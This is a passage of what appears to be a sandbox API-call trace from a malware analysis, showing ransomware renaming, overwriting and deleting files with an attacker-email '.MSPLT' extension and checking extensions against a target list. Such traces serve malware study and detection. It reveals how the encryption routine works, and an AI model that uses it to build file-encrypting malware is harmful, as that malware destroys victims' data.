"c:\\588bce7c90097ed212\\graphics\\warn.ico.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x364 [0174.137] GetLastError () returned 0x0 [0174.137] ReadFile (in: hFile=0x378, lpBuffer=0x3c5e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x369fecc, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesRead=0x369fecc*=0x2796, lpOverlapped=0x0) returned 1 [0174.159] WriteFile (in: hFile=0x364, lpBuffer=0x3c5e020*, nNumberOfBytesToWrite=0x27a0, lpNumberOfBytesWritten=0x369fc94, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesWritten=0x369fc94*=0x27a0, lpOverlapped=0x0) returned 1 [0174.160] ReadFile (in: hFile=0x378, lpBuffer=0x3c5e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x369fecc, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesRead=0x369fecc*=0x0, lpOverlapped=0x0) returned 1 [0174.161] WriteFile (in: hFile=0x364, lpBuffer=0x3c5e020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x369fc94, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesWritten=0x369fc94*=0xe4, lpOverlapped=0x0) returned 1 [0174.161] SetEndOfFile (hFile=0x364) returned 1 [0174.161] CloseHandle (hObject=0x364) returned 1 [0174.162] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.162] SetEndOfFile (hFile=0x378) returned 1 [0174.163] CloseHandle (hObject=0x378) returned 1 [0174.163] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\warn.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0174.164] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\warn.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico")) returned 1 [0174.164] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 39 [0174.164] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 39 [0174.164] lstrlenW (lpString=".doc") returned 4 [0174.164] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0174.164] lstrlenW (lpString=".docx") returned 5 [0174.164] lstrcmpiW (lpString1=".docx", lpString2="n.ico") returned -1 [0174.164] lstrlenW (lpString=".pdf") returned 4 [0174.164] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0174.164] lstrlenW (lpString=".xls") returned 4 [0174.164] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0174.164] lstrlenW (lpString=".xlsx") returned 5 [0174.164] lstrcmpiW (lpString1=".xlsx", lpString2="n.ico") returned -1 [0174.165] lstrlenW (lpString=".ppt") returned 4 [0174.165] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0174.165] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 39 [0174.165] lstrlenW (lpString=".zip") returned 4 [0174.165] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0174.165] lstrlenW (lpString=".rar") returned 4 [0174.165] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0174.165] lstrlenW (lpString=".bz2") returned 4 [0174.165] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0174.165] lstrlenW (lpString=".7z") returned 3 [0174.165] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0174.165] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 39 [0174.165] lstrlenW (lpString=".dbf") returned 4 [0174.165] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0174.165] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 39 [0174.165] lstrlenW (lpString=".1cd") returned 4 [0174.165] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0174.165] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 39 [0174.165] lstrlenW (lpString=".jpg") returned 4 [0174.165] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0174.165] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 39 [0174.165] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 39 [0174.165] lstrlenW (lpString=".doc") returned 4 [0174.165] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0174.165] lstrlenW (lpString=".docx") returned 5 [0174.165] lstrcmpiW (lpString1=".docx", lpString2="n.ico") returned -1 [0174.166] lstrlenW (lpString=".pdf") returned 4 [0174.166] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0174.166] lstrlenW (lpString=".xls") returned 4 [0174.166] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0174.166] lstrlenW (lpString=".xlsx") returned 5 [0174.166] lstrcmpiW (lpString1=".xlsx", lpString2="n.ico") returned -1 [0174.166] lstrlenW (lpString=".ppt") returned 4 [0174.166] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0174.166] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 39 [0174.166] lstrlenW (lpString=".zip") returned 4 [0174.166] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0174.166] lstrlenW (lpString=".rar") returned 4 [0174.166] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0174.166] lstrlenW (lpString=".bz2") returned 4 [0174.166] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0174.166] lstrlenW (lpString=".7z") returned 3 [0174.166] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0174.166] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 39 [0174.166] lstrlenW (lpString=".dbf") returned 4 [0174.166] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0174.166] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 39 [0174.166] lstrlenW (lpString=".1cd") returned 4 [0174.166] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0174.166] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 39 [0174.166] lstrlenW (lpString=".jpg") returned 4 [0174.166] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0174.167] lstrcmpiW (lpString1=".msi", lpString2=".MSPLT") returned -1 [0174.167] lstrlenW (lpString="netfx_Core_x64.msi") returned 18 [0174.167] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x64.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0174.185] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x369ff14 | out: lpFileSize=0x369ff14*=1901056) returned 1 [0174.185] CloseHandle (hObject=0x378) returned 1 [0174.185] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x64.msi")) returned 0x80 [0174.185] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x64.msi.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x64.msi.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0174.185] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\netfx_Core_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x64.msi"), lpNewFileName="C:\\588bce7c90097ed212\\netfx_Core_x64.msi.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x64.msi.id-b4197730.[supermetasploit@aol.com].msplt")) returned 1 [0174.222] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x64.msi.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x64.msi.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0174.222] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fc64 | out: lpNewFilePointer=0x0) returned 1 [0174.222] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fc24 | out: lpNewFilePointer=0x0) returned 1 [0174.222] ReadFile (in: hFile=0x378, lpBuffer=0x3c5e058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x369fc30, lpOverlapped=0x0 | out: lpBuffer=0x3c5e058*, lpNumberOfBytesRead=0x369fc30*=0x40000, lpOverlapped=0x0) returned 1 [0174.232] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x9ab55, lpNewFilePointer=0x0, dwMoveMethod=0x369fc24 | out: lpNewFilePointer=0x0) returned 1 [0174.232] ReadFile (in: hFile=0x378, lpBuffer=0x3c9e058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x369fc30, lpOverlapped=0x0 | out: lpBuffer=0x3c9e058*, lpNumberOfBytesRead=0x369fc30*=0x40000, lpOverlapped=0x0) returned 1 [0174.242] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x369fc64 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.242] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x190200, lpNewFilePointer=0x0, dwMoveMethod=0x369fc24 | out: lpNewFilePointer=0x0) returned 1 [0174.243] ReadFile (in: hFile=0x378, lpBuffer=0x3cde058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x369fc30, lpOverlapped=0x0 | out: lpBuffer=0x3cde058*, lpNumberOfBytesRead=0x369fc30*=0x40000, lpOverlapped=0x0) returned 1 [0174.703] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.703] WriteFile (in: hFile=0x378, lpBuffer=0x3c5e020*, nNumberOfBytesToWrite=0xc0110, lpNumberOfBytesWritten=0x369fca8, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesWritten=0x369fca8*=0xc0110, lpOverlapped=0x0) returned 1 [0174.734] SetEndOfFile (hFile=0x378) returned 1 [0174.735] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x40000) returned 0x3fb82b0 [0174.735] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fc74 | out: lpNewFilePointer=0x0) returned 1 [0174.735] WriteFile (in: hFile=0x378, lpBuffer=0x3fb82b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x369fc80, lpOverlapped=0x0 | out: lpBuffer=0x3fb82b0*, lpNumberOfBytesWritten=0x369fc80*=0x40000, lpOverlapped=0x0) returned 1 [0174.737] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x9ab55, lpNewFilePointer=0x0, dwMoveMethod=0x369fc74 | out: lpNewFilePointer=0x0) returned 1 [0174.737] WriteFile (in: hFile=0x378, lpBuffer=0x3fb82b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x369fc80, lpOverlapped=0x0 | out: lpBuffer=0x3fb82b0*, lpNumberOfBytesWritten=0x369fc80*=0x40000, lpOverlapped=0x0) returned 1 [0174.740] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x190200, lpNewFilePointer=0x0, dwMoveMethod=0x369fc74 | out: lpNewFilePointer=0x0) returned 1 [0174.740] WriteFile (in: hFile=0x378, lpBuffer=0x3fb82b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x369fc80, lpOverlapped=0x0 | out: lpBuffer=0x3fb82b0*, lpNumberOfBytesWritten=0x369fc80*=0x40000, lpOverlapped=0x0) returned 1 [0174.743] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3fb82b0 | out: hHeap=0x710000) returned 1 [0174.743] CloseHandle (hObject=0x378) returned 1 [0175.761] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x64.msi.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0175.775] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 40 [0175.775] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 40 [0175.775] lstrlenW (lpString=".doc") returned 4 [0175.775] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0175.775] lstrlenW (lpString=".docx") returned 5 [0175.775] lstrcmpiW (lpString1=".docx", lpString2="4.msi") returned -1 [0175.775] lstrlenW (lpString=".pdf") returned 4 [0175.775] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0175.775] lstrlenW (lpString=".xls") returned 4 [0175.775] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0175.775] lstrlenW (lpString=".xlsx") returned 5 [0175.775] lstrcmpiW (lpString1=".xlsx", lpString2="4.msi") returned -1 [0175.775] lstrlenW (lpString=".ppt") returned 4 [0175.775] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0175.775] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 40 [0175.775] lstrlenW (lpString=".zip") returned 4 [0175.775] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0175.775] lstrlenW (lpString=".rar") returned 4 [0175.775] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0175.775] lstrlenW (lpString=".bz2") returned 4 [0175.775] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0175.775] lstrlenW (lpString=".7z") returned 3 [0175.775] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0175.776] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 40 [0175.776] lstrlenW (lpString=".dbf") returned 4 [0175.776] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0175.776] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 40 [0175.776] lstrlenW (lpString=".1cd") returned 4 [0175.776] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0175.776] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 40 [0175.776] lstrlenW (lpString=".jpg") returned 4 [0175.776] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0175.776] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 40 [0175.776] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 40 [0175.776] lstrlenW (lpString=".doc") returned 4 [0175.776] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0175.776] lstrlenW (lpString=".docx") returned 5 [0175.776] lstrcmpiW (lpString1=".docx", lpString2="4.msi") returned -1 [0175.776] lstrlenW (lpString=".pdf") returned 4 [0175.776] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0175.776] lstrlenW (lpString=".xls") returned 4 [0175.776] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0175.776] lstrlenW (lpString=".xlsx") returned 5 [0175.776] lstrcmpiW (lpString1=".xlsx", lpString2="4.msi") returned -1 [0175.776] lstrlenW (lpString=".ppt") returned 4 [0175.776] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0175.776] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 40 [0175.776] lstrlenW (lpString=".zip") returned 4 [0175.776] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0175.776] lstrlenW (lpString=".rar") returned 4 [0175.776] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0175.776] lstrlenW (lpString=".bz2") returned 4 [0175.776] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0175.776] lstrlenW (lpString=".7z") returned 3 [0175.776] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0175.776] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 40 [0175.776] lstrlenW (lpString=".dbf") returned 4 [0175.776] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0175.777] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 40 [0175.777] lstrlenW (lpString=".1cd") returned 4 [0175.777] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0175.777] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 40 [0175.777] lstrlenW (lpString=".jpg") returned 4 [0175.777] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0175.777] lstrcmpiW (lpString1=".msi", lpString2=".MSPLT") returned -1 [0175.777] lstrlenW (lpString="netfx_Extended_x64.msi") returned 22 [0175.777] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0175.778] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x369ff14 | out: lpFileSize=0x369ff14*=872448) returned 1 [0175.778] CloseHandle (hObject=0x378) returned 1 [0175.778] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi")) returned 0x80 [0175.778] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0175.779] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0175.779] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.779] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.779] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0175.779] GetLastError () returned 0x0 [0175.779] ReadFile (in: hFile=0x378, lpBuffer=0x3c5e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x369fecc, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesRead=0x369fecc*=0xd5000, lpOverlapped=0x0) returned 1 [0176.317] WriteFile (in: hFile=0x358, lpBuffer=0x3c5e020*, nNumberOfBytesToWrite=0xd5010, lpNumberOfBytesWritten=0x369fc94, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesWritten=0x369fc94*=0xd5010, lpOverlapped=0x0) returned 1 [0176.757] ReadFile (in: hFile=0x378, lpBuffer=0x3c5e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x369fecc, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesRead=0x369fecc*=0x0, lpOverlapped=0x0) returned 1 [0176.757] WriteFile (in: hFile=0x358, lpBuffer=0x3c5e020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x369fc94, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesWritten=0x369fc94*=0x100, lpOverlapped=0x0) returned 1 [0176.757] SetEndOfFile (hFile=0x358) returned 1 [0179.862] CloseHandle (hObject=0x358) returned 1 [0179.887] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fec0 | out: lpNewFilePointer=0x0) returned 1 [0179.887] SetEndOfFile (hFile=0x378) returned 1 [0179.945] CloseHandle (hObject=0x378) returned 1 [0179.945] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0179.945] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi")) returned 1 [0179.946] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 44 [0179.946] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 44 [0179.946] lstrlenW (lpString=".doc") returned 4 [0179.946] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0179.946] lstrlenW (lpString=".docx") returned 5 [0179.946] lstrcmpiW (lpString1=".docx", lpString2="4.msi") returned -1 [0179.946] lstrlenW (lpString=".pdf") returned 4 [0179.946] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0179.946] lstrlenW (lpString=".xls") returned 4 [0179.946] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0179.946] lstrlenW (lpString=".xlsx") returned 5 [0179.946] lstrcmpiW (lpString1=".xlsx", lpString2="4.msi") returned -1 [0179.946] lstrlenW (lpString=".ppt") returned 4 [0179.946] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0179.946] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 44 [0179.946] lstrlenW (lpString=".zip") returned 4 [0179.947] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0179.947] lstrlenW (lpString=".rar") returned 4 [0179.947] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0179.947] lstrlenW (lpString=".bz2") returned 4 [0179.947] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0179.947] lstrlenW (lpString=".7z") returned 3 [0179.947] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0179.947] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 44 [0179.947] lstrlenW (lpString=".dbf") returned 4 [0179.947] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0179.947] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 44 [0179.947] lstrlenW (lpString=".1cd") returned 4 [0179.947] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0179.947] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 44 [0179.947] lstrlenW (lpString=".jpg") returned 4 [0179.947] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0179.947] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 44 [0179.947] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 44 [0179.947] lstrlenW (lpString=".doc") returned 4 [0179.947] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0179.947] lstrlenW (lpString=".docx") returned 5 [0179.947] lstrcmpiW (lpString1=".docx", lpString2="4.msi") returned -1 [0179.947] lstrlenW (lpString=".pdf") returned 4 [0179.947] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0179.947] lstrlenW (lpString=".xls") returned 4 [0179.947] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0179.948] lstrlenW (lpString=".xlsx") returned 5 [0179.948] lstrcmpiW (lpString1=".xlsx", lpString2="4.msi") returned -1 [0179.948] lstrlenW (lpString=".ppt") returned 4 [0179.948] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0179.948] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 44 [0179.948] lstrlenW (lpString=".zip") returned 4 [0179.948] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0179.948] lstrlenW (lpString=".rar") returned 4 [0179.948] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0179.948] lstrlenW (lpString=".bz2") returned 4 [0179.948] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0179.948] lstrlenW (lpString=".7z") returned 3 [0179.948] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0179.948] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 44 [0179.948] lstrlenW (lpString=".dbf") returned 4 [0179.948] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0179.948] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 44 [0179.948] lstrlenW (lpString=".1cd") returned 4 [0179.948] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0179.948] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 44 [0179.948] lstrlenW (lpString=".jpg") returned 4 [0179.948] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0179.948] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0179.948] lstrlenW (lpString="SetupUi.dll") returned 11 [0179.949] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.dll" (normalized: "c:\\588bce7c90097ed212\\setupui.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0179.949] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x369ff14 | out: lpFileSize=0x369ff14*=295248) returned 1 [0179.949] CloseHandle (hObject=0x378) returned 1 [0179.949] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.dll" (normalized: "c:\\588bce7c90097ed212\\setupui.dll")) returned 0x80 [0179.949] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\setupui.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0179.950] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.dll" (normalized: "c:\\588bce7c90097ed212\\setupui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0179.950] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fec0 | out: lpNewFilePointer=0x0) returned 1 [0179.950] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fec0 | out: lpNewFilePointer=0x0) returned 1 [0179.950] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\setupui.dll.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0179.950] GetLastError () returned 0x0 [0179.950] ReadFile (in: hFile=0x378, lpBuffer=0x3c5e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x369fecc, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesRead=0x369fecc*=0x48150, lpOverlapped=0x0) returned 1 [0181.466] WriteFile (in: hFile=0x358, lpBuffer=0x3c5e020*, nNumberOfBytesToWrite=0x48160, lpNumberOfBytesWritten=0x369fc94, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesWritten=0x369fc94*=0x48160, lpOverlapped=0x0) returned 1 [0181.478] ReadFile (in: hFile=0x378, lpBuffer=0x3c5e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x369fecc, lpOverlapped=0x0 | out: 